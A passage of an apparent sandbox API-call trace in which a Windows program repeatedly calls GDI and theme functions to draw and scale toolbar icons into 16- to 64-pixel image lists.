(hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] DrawThemeBackground () returned 0x0 [0043.012] DrawThemeEdge () returned 0x0 [0043.012] StretchBlt (hdcDest=0x1c010522, xDest=80, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] DrawThemeBackground () returned 0x0 [0043.012] DrawThemeEdge () returned 0x0 [0043.012] StretchBlt (hdcDest=0x1c010522, xDest=96, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] DrawThemeBackground () returned 0x0 [0043.012] DrawThemeEdge () returned 0x0 [0043.012] StretchBlt (hdcDest=0x1c010522, xDest=112, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] DrawThemeBackground () returned 0x0 [0043.012] DrawThemeEdge () returned 0x0 [0043.012] StretchBlt (hdcDest=0x1c010522, xDest=144, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.012] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.012] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.012] DrawThemeBackground () returned 0x0 [0043.012] DrawThemeEdge () returned 0x0 [0043.012] StretchBlt (hdcDest=0x1c010522, xDest=160, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.013] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.013] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.013] DrawThemeBackground () returned 0x0 [0043.013] DrawThemeEdge () returned 0x0 [0043.013] StretchBlt (hdcDest=0x1c010522, xDest=176, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.013] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.013] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.013] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.013] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.013] DrawThemeBackground () returned 0x0 [0043.013] DrawThemeEdge () returned 0x0 [0043.013] StretchBlt (hdcDest=0x1c010522, xDest=208, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.013] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.013] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.013] DrawThemeBackground () returned 0x0 [0043.013] DrawThemeEdge () returned 0x0 [0043.013] StretchBlt (hdcDest=0x1c010522, xDest=224, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.013] SetBkColor (hdc=0x310105e8, color=0xffffff) returned 0xffffff [0043.013] ExtTextOutW (hdc=0x310105e8, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.013] DrawThemeBackground () returned 0x0 [0043.013] DrawThemeEdge () returned 0x0 [0043.013] StretchBlt (hdcDest=0x1c010522, xDest=240, yDest=0, wDest=16, hDest=16, hdcSrc=0x310105e8, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.013] GetProcAddress (hModule=0x73d30000, lpProcName="CloseThemeData") returned 0x73d62680 [0043.013] CloseThemeData () returned 0x0 [0043.013] SelectObject (hdc=0x310105e8, h=0x85000f) returned 0x3705053c [0043.013] SelectObject (hdc=0x1c010522, h=0x85000f) returned 0x57050527 [0043.013] ImageList_Add (himl=0x54a248, hbmImage=0x57050527, hbmMask=0x0) returned 0 [0043.014] DeleteDC (hdc=0x310105e8) returned 1 [0043.014] DeleteObject (ho=0x3705053c) returned 1 [0043.014] DeleteDC (hdc=0x1c010522) returned 1 [0043.014] DeleteObject (ho=0x57050527) returned 1 [0043.014] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x60) returned 0x2046c38 [0043.014] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x44) returned 0x2046ca0 [0043.015] RtlAllocateHeap (HeapHandle=0x2040000, Flags=0x0, Size=0x7c) returned 0x2046cf0 [0043.015] GetSysColor (nIndex=5) returned 0xffffff [0043.015] CreateCompatibleBitmap (hdc=0x10105c7, cx=512, cy=32) returned 0x58050527 [0043.015] ImageList_Create (cx=32, cy=32, flags=0x20, cInitial=16, cGrow=1) returned 0x54a8f0 [0043.015] CreateCompatibleDC (hdc=0x10105c7) returned 0x310105ea [0043.015] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x530504fd [0043.016] CreateCompatibleDC (hdc=0x10105c7) returned 0x23010536 [0043.016] SelectObject (hdc=0x23010536, h=0x530504fd) returned 0x85000f [0043.016] IsThemeActive () returned 0x1 [0043.016] IsAppThemed () returned 0x1 [0043.016] OpenThemeData () returned 0x10001 [0043.016] SelectObject (hdc=0x310105ea, h=0x58050527) returned 0x85000f [0043.016] SetBkColor (hdc=0x310105ea, color=0xffffff) returned 0xffffff [0043.016] ExtTextOutW (hdc=0x310105ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.016] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.016] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.016] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.016] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.016] DrawThemeBackground () returned 0x0 [0043.016] DrawThemeEdge () returned 0x0 [0043.016] StretchBlt (hdcDest=0x310105ea, xDest=32, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.016] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.016] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.016] DrawThemeBackground () returned 0x0 [0043.016] DrawThemeEdge () returned 0x0 [0043.016] StretchBlt (hdcDest=0x310105ea, xDest=64, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.016] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.016] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.016] DrawThemeBackground () returned 0x0 [0043.016] DrawThemeEdge () returned 0x0 [0043.016] StretchBlt (hdcDest=0x310105ea, xDest=96, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.016] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.016] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] DrawThemeBackground () returned 0x0 [0043.017] DrawThemeEdge () returned 0x0 [0043.017] StretchBlt (hdcDest=0x310105ea, xDest=160, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] DrawThemeBackground () returned 0x0 [0043.017] DrawThemeEdge () returned 0x0 [0043.017] StretchBlt (hdcDest=0x310105ea, xDest=192, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] DrawThemeBackground () returned 0x0 [0043.017] DrawThemeEdge () returned 0x0 [0043.017] StretchBlt (hdcDest=0x310105ea, xDest=224, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] DrawThemeBackground () returned 0x0 [0043.017] DrawThemeEdge () returned 0x0 [0043.017] StretchBlt (hdcDest=0x310105ea, xDest=288, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] DrawThemeBackground () returned 0x0 [0043.017] DrawThemeEdge () returned 0x0 [0043.017] StretchBlt (hdcDest=0x310105ea, xDest=320, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.017] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.017] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.017] DrawThemeBackground () returned 0x0 [0043.018] DrawThemeEdge () returned 0x0 [0043.018] StretchBlt (hdcDest=0x310105ea, xDest=352, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.018] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.018] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.018] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.018] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.018] DrawThemeBackground () returned 0x0 [0043.018] DrawThemeEdge () returned 0x0 [0043.018] StretchBlt (hdcDest=0x310105ea, xDest=416, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.018] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.018] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.018] DrawThemeBackground () returned 0x0 [0043.018] DrawThemeEdge () returned 0x0 [0043.018] StretchBlt (hdcDest=0x310105ea, xDest=448, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.018] SetBkColor (hdc=0x23010536, color=0xffffff) returned 0xffffff [0043.018] ExtTextOutW (hdc=0x23010536, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.018] DrawThemeBackground () returned 0x0 [0043.018] DrawThemeEdge () returned 0x0 [0043.018] StretchBlt (hdcDest=0x310105ea, xDest=480, yDest=0, wDest=32, hDest=32, hdcSrc=0x23010536, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.018] CloseThemeData () returned 0x0 [0043.018] SelectObject (hdc=0x23010536, h=0x85000f) returned 0x530504fd [0043.018] SelectObject (hdc=0x310105ea, h=0x85000f) returned 0x58050527 [0043.018] ImageList_Add (himl=0x54a8f0, hbmImage=0x58050527, hbmMask=0x0) returned 0 [0043.020] DeleteDC (hdc=0x23010536) returned 1 [0043.020] DeleteObject (ho=0x530504fd) returned 1 [0043.020] DeleteDC (hdc=0x310105ea) returned 1 [0043.020] DeleteObject (ho=0x58050527) returned 1 [0043.020] GetSysColor (nIndex=5) returned 0xffffff [0043.020] CreateCompatibleBitmap (hdc=0x10105c7, cx=768, cy=48) returned 0x59050527 [0043.025] ImageList_Create (cx=48, cy=48, flags=0x20, cInitial=16, cGrow=1) returned 0x54af98 [0043.025] CreateCompatibleDC (hdc=0x10105c7) returned 0x70010519 [0043.026] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x37050192 [0043.026] CreateCompatibleDC (hdc=0x10105c7) returned 0x610107ea [0043.026] SelectObject (hdc=0x610107ea, h=0x37050192) returned 0x85000f [0043.026] IsThemeActive () returned 0x1 [0043.026] IsAppThemed () returned 0x1 [0043.026] OpenThemeData () returned 0x10001 [0043.026] SelectObject (hdc=0x70010519, h=0x59050527) returned 0x85000f [0043.026] SetBkColor (hdc=0x70010519, color=0xffffff) returned 0xffffff [0043.026] ExtTextOutW (hdc=0x70010519, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.026] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.026] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.026] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.026] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.026] DrawThemeBackground () returned 0x0 [0043.026] DrawThemeEdge () returned 0x0 [0043.026] StretchBlt (hdcDest=0x70010519, xDest=48, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.026] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.026] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.026] DrawThemeBackground () returned 0x0 [0043.026] DrawThemeEdge () returned 0x0 [0043.026] StretchBlt (hdcDest=0x70010519, xDest=96, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.026] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.026] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.026] DrawThemeBackground () returned 0x0 [0043.027] DrawThemeEdge () returned 0x0 [0043.027] StretchBlt (hdcDest=0x70010519, xDest=144, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] DrawThemeBackground () returned 0x0 [0043.027] DrawThemeEdge () returned 0x0 [0043.027] StretchBlt (hdcDest=0x70010519, xDest=240, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] DrawThemeBackground () returned 0x0 [0043.027] DrawThemeEdge () returned 0x0 [0043.027] StretchBlt (hdcDest=0x70010519, xDest=288, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] DrawThemeBackground () returned 0x0 [0043.027] DrawThemeEdge () returned 0x0 [0043.027] StretchBlt (hdcDest=0x70010519, xDest=336, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] DrawThemeBackground () returned 0x0 [0043.027] DrawThemeEdge () returned 0x0 [0043.027] StretchBlt (hdcDest=0x70010519, xDest=432, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.027] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.027] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.027] DrawThemeBackground () returned 0x0 [0043.027] DrawThemeEdge () returned 0x0 [0043.028] StretchBlt (hdcDest=0x70010519, xDest=480, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.028] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.028] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.028] DrawThemeBackground () returned 0x0 [0043.028] DrawThemeEdge () returned 0x0 [0043.028] StretchBlt (hdcDest=0x70010519, xDest=528, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.028] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.028] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.028] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.028] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.028] DrawThemeBackground () returned 0x0 [0043.028] DrawThemeEdge () returned 0x0 [0043.028] StretchBlt (hdcDest=0x70010519, xDest=624, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.028] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.028] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.028] DrawThemeBackground () returned 0x0 [0043.028] DrawThemeEdge () returned 0x0 [0043.028] StretchBlt (hdcDest=0x70010519, xDest=672, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.028] SetBkColor (hdc=0x610107ea, color=0xffffff) returned 0xffffff [0043.028] ExtTextOutW (hdc=0x610107ea, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.028] DrawThemeBackground () returned 0x0 [0043.028] DrawThemeEdge () returned 0x0 [0043.028] StretchBlt (hdcDest=0x70010519, xDest=720, yDest=0, wDest=48, hDest=48, hdcSrc=0x610107ea, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.028] CloseThemeData () returned 0x0 [0043.028] SelectObject (hdc=0x610107ea, h=0x85000f) returned 0x37050192 [0043.028] SelectObject (hdc=0x70010519, h=0x85000f) returned 0x59050527 [0043.028] ImageList_Add (himl=0x54af98, hbmImage=0x59050527, hbmMask=0x0) returned 0 [0043.031] DeleteDC (hdc=0x610107ea) returned 1 [0043.031] DeleteObject (ho=0x37050192) returned 1 [0043.031] DeleteDC (hdc=0x70010519) returned 1 [0043.031] DeleteObject (ho=0x59050527) returned 1 [0043.031] GetSysColor (nIndex=5) returned 0xffffff [0043.031] CreateCompatibleBitmap (hdc=0x10105c7, cx=1024, cy=64) returned 0x5a050527 [0043.034] ImageList_Create (cx=64, cy=64, flags=0x20, cInitial=16, cGrow=1) returned 0x54b640 [0043.034] CreateCompatibleDC (hdc=0x10105c7) returned 0x1f0107d7 [0043.034] CreateCompatibleBitmap (hdc=0x10105c7, cx=16, cy=16) returned 0x740507e9 [0043.034] CreateCompatibleDC (hdc=0x10105c7) returned 0x24010612 [0043.034] SelectObject (hdc=0x24010612, h=0x740507e9) returned 0x85000f [0043.034] IsThemeActive () returned 0x1 [0043.034] IsAppThemed () returned 0x1 [0043.034] OpenThemeData () returned 0x10001 [0043.034] SelectObject (hdc=0x1f0107d7, h=0x5a050527) returned 0x85000f [0043.034] SetBkColor (hdc=0x1f0107d7, color=0xffffff) returned 0xffffff [0043.034] ExtTextOutW (hdc=0x1f0107d7, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.034] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.034] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.034] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.034] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.034] DrawThemeBackground () returned 0x0 [0043.034] DrawThemeEdge () returned 0x0 [0043.034] StretchBlt (hdcDest=0x1f0107d7, xDest=64, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.035] DrawThemeBackground () returned 0x0 [0043.035] DrawThemeEdge () returned 0x0 [0043.035] StretchBlt (hdcDest=0x1f0107d7, xDest=128, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.035] DrawThemeBackground () returned 0x0 [0043.035] DrawThemeEdge () returned 0x0 [0043.035] StretchBlt (hdcDest=0x1f0107d7, xDest=192, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.035] DrawThemeBackground () returned 0x0 [0043.035] DrawThemeEdge () returned 0x0 [0043.035] StretchBlt (hdcDest=0x1f0107d7, xDest=320, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.035] DrawThemeBackground () returned 0x0 [0043.035] DrawThemeEdge () returned 0x0 [0043.035] StretchBlt (hdcDest=0x1f0107d7, xDest=384, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.035] DrawThemeBackground () returned 0x0 [0043.035] DrawThemeEdge () returned 0x0 [0043.035] StretchBlt (hdcDest=0x1f0107d7, xDest=448, yDest=0, wDest=64, hDest=64, hdcSrc=0x24010612, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0043.035] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.035] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] SetBkColor (hdc=0x24010612, color=0xffffff) returned 0xffffff [0043.036] ExtTextOutW (hdc=0x24010612, x=0, y=0, options=0x2, lprect=0x19ebc8, lpString=0x0, c=0x0, lpDx=0x0) returned 1 [0043.036] DrawThemeBackground () returned 0x0 [0043.036] DrawThemeEdge () returned 0x0 [0043.036] StretchBlt (hdcDest=0x1f0107d7, xDest=576, yDest=0, wDest=64, hDest=64, 